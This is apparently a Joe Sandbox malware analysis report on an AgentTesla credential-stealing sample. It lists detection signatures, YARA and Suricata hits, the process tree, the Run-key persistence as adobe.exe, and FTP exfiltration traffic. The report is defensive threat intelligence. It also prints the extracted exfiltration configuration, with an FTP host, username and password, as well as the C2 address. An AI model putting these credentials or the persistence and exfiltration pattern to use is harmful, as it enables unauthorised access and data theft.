Edit tour

Windows Analysis Report
ukBQ4ch2nE.exe

Overview

General Information

Sample name:	ukBQ4ch2nE.exe renamed because original name is a hash value
Original sample name:	edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26.exe
Analysis ID:	1588356
MD5:	74421477fafaf6beb9d8e3806e1f6643
SHA1:	44857e574c1892ef8a3f8c8f41c5c0c0aab20b83
SHA256:	edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26
Tags:	AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Drops executable to a common third party application directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ukBQ4ch2nE.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\ukBQ4ch2nE.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)

ukBQ4ch2nE.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\ukBQ4ch2nE.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)

adobe.exe (PID: 516 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)

adobe.exe (PID: 1400 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)

adobe.exe (PID: 6284 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)

adobe.exe (PID: 3000 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 74421477FAFAF6BEB9D8E3806E1F6643)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ukBQ4ch2nE.exe PID: 4576	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ukBQ4ch2nE.exe PID: 4576	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ukBQ4ch2nE.exe PID: 6412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ukBQ4ch2nE.exe PID: 6412	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 1400	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 1400	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 3000	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 3000	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.adobe.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.adobe.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.adobe.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f56:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fc8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34052:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340e4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3414e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341c0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34256:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x342e6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.adobe.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x31239:$s2: GetPrivateProfileString 0x30944:$s3: get_OSFullName 0x31f6e:$s5: remove_Key 0x32113:$s5: remove_Key 0x33072:$s6: FtpWebRequest 0x33f38:$s7: logins 0x344aa:$s7: logins 0x371bb:$s7: logins 0x3726d:$s7: logins 0x38bbe:$s7: logins 0x37e07:$s9: 1.85 (Hash, version 2, native byte-order)
1.2.ukBQ4ch2nE.exe.4511c80.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ukBQ4ch2nE.exe.4511c80.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.ukBQ4ch2nE.exe.4511c80.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32156:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x321c8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32252:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x322e4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3234e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x323c0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32456:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x324e6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
1.2.ukBQ4ch2nE.exe.4511c80.1.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f439:$s2: GetPrivateProfileString 0x2eb44:$s3: get_OSFullName 0x3016e:$s5: remove_Key 0x30313:$s5: remove_Key 0x31272:$s6: FtpWebRequest 0x32138:$s7: logins 0x326aa:$s7: logins 0x353bb:$s7: logins 0x3546d:$s7: logins 0x36dbe:$s7: logins 0x36007:$s9: 1.85 (Hash, version 2, native byte-order)
1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f56:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f586:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xaa9a6:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fc8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f5f8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xaaa18:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34052:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f682:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xaaaa2:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340e4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f714:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xaab34:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3414e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f77e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xaab9e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341c0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f7f0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaac10:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34256:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f886:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaaca6:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x31239:$s2: GetPrivateProfileString 0x6c869:$s2: GetPrivateProfileString 0xa7c89:$s2: GetPrivateProfileString 0x30944:$s3: get_OSFullName 0x6bf74:$s3: get_OSFullName 0xa7394:$s3: get_OSFullName 0x31f6e:$s5: remove_Key 0x32113:$s5: remove_Key 0x6d59e:$s5: remove_Key 0x6d743:$s5: remove_Key 0xa89be:$s5: remove_Key 0xa8b63:$s5: remove_Key 0x33072:$s6: FtpWebRequest 0x6e6a2:$s6: FtpWebRequest 0xa9ac2:$s6: FtpWebRequest 0x33f38:$s7: logins 0x344aa:$s7: logins 0x371bb:$s7: logins 0x3726d:$s7: logins 0x38bbe:$s7: logins 0x6f568:$s7: logins
1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a656:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1a5c86:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1e10a6:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a6c8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1a5cf8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1e1118:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a752:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1a5d82:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1e11a2:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a7e4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1a5e14:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1e1234:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a84e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1a5e7e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1e129e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a8c0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1a5ef0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1e1310:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a956:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1a5f86:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1e13a6:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x167939:$s2: GetPrivateProfileString 0x1a2f69:$s2: GetPrivateProfileString 0x1de389:$s2: GetPrivateProfileString 0x167044:$s3: get_OSFullName 0x1a2674:$s3: get_OSFullName 0x1dda94:$s3: get_OSFullName 0x16866e:$s5: remove_Key 0x168813:$s5: remove_Key 0x1a3c9e:$s5: remove_Key 0x1a3e43:$s5: remove_Key 0x1df0be:$s5: remove_Key 0x1df263:$s5: remove_Key 0x169772:$s6: FtpWebRequest 0x1a4da2:$s6: FtpWebRequest 0x1e01c2:$s6: FtpWebRequest 0x16a638:$s7: logins 0x16abaa:$s7: logins 0x16d8bb:$s7: logins 0x16d96d:$s7: logins 0x16f2be:$s7: logins 0x1a5c68:$s7: logins
1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x128626:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x163c56:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x19f076:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x128698:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x163cc8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x19f0e8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x128722:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x163d52:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x19f172:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1287b4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x163de4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x19f204:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x12881e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x163e4e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x19f26e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x128890:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x163ec0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x19f2e0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x128926:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x163f56:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x19f376:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x125909:$s2: GetPrivateProfileString 0x160f39:$s2: GetPrivateProfileString 0x19c359:$s2: GetPrivateProfileString 0x125014:$s3: get_OSFullName 0x160644:$s3: get_OSFullName 0x19ba64:$s3: get_OSFullName 0x12663e:$s5: remove_Key 0x1267e3:$s5: remove_Key 0x161c6e:$s5: remove_Key 0x161e13:$s5: remove_Key 0x19d08e:$s5: remove_Key 0x19d233:$s5: remove_Key 0x127742:$s6: FtpWebRequest 0x162d72:$s6: FtpWebRequest 0x19e192:$s6: FtpWebRequest 0x128608:$s7: logins 0x128b7a:$s7: logins 0x12b88b:$s7: logins 0x12b93d:$s7: logins 0x12d28e:$s7: logins 0x163c38:$s7: logins
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ukBQ4ch2nE.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:15:25.002925+0100	2029927	1	A Network Trojan was detected	192.168.2.11	49712	213.189.52.181	21	TCP
2025-01-11T01:15:36.646308+0100	2029927	1	A Network Trojan was detected	192.168.2.11	49718	213.189.52.181	21	TCP
2025-01-11T01:15:44.430083+0100	2029927	1	A Network Trojan was detected	192.168.2.11	49726	213.189.52.181	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:15:25.560566+0100	2855542	1	A Network Trojan was detected	192.168.2.11	49713	213.189.52.181	65516	TCP
2025-01-11T01:15:25.566865+0100	2855542	1	A Network Trojan was detected	192.168.2.11	49713	213.189.52.181	65516	TCP
2025-01-11T01:15:37.203280+0100	2855542	1	A Network Trojan was detected	192.168.2.11	49721	213.189.52.181	64074	TCP
2025-01-11T01:15:37.208459+0100	2855542	1	A Network Trojan was detected	192.168.2.11	49721	213.189.52.181	64074	TCP
2025-01-11T01:15:44.991137+0100	2855542	1	A Network Trojan was detected	192.168.2.11	49727	213.189.52.181	63872	TCP
2025-01-11T01:15:44.996483+0100	2855542	1	A Network Trojan was detected	192.168.2.11	49727	213.189.52.181	63872	TCP

Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:16:57.647871+0100	1800007	1	A Network Trojan was detected	192.168.2.11	49929	213.189.52.181	63898	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ukBQ4ch2nE.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://s4.serv00.com

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Avira: detection malicious, Label: HEUR/AGEN.1306767

Found malware configuration

Source: 5.2.adobe.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: ukBQ4ch2nE.exe	Virustotal: Detection: 75%			Perma Link
Source: ukBQ4ch2nE.exe	ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ukBQ4ch2nE.exe

Joe Sandbox ML: detected

Source: ukBQ4ch2nE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49725 version: TLS 1.2

Source: ukBQ4ch2nE.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49721 -> 213.189.52.181:64074
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49727 -> 213.189.52.181:63872
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49713 -> 213.189.52.181:65516
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49712 -> 213.189.52.181:21
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49718 -> 213.189.52.181:21
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49726 -> 213.189.52.181:21
Source: Network traffic	Suricata IDS: 1800007 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs : 192.168.2.11:49929 -> 213.189.52.181:63898

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 213.189.52.181 ports 63872,65516,63898,1,2,64074,21

Source: global traffic

TCP traffic: 192.168.2.11:49713 -> 213.189.52.181:65516

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 213.189.52.181 213.189.52.181

Source: Joe Sandbox View

ASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown

FTP traffic detected: 213.189.52.181:21 -> 192.168.2.11:49712 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s4.serv00.com

Source: adobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: adobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s4.serv00.com
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
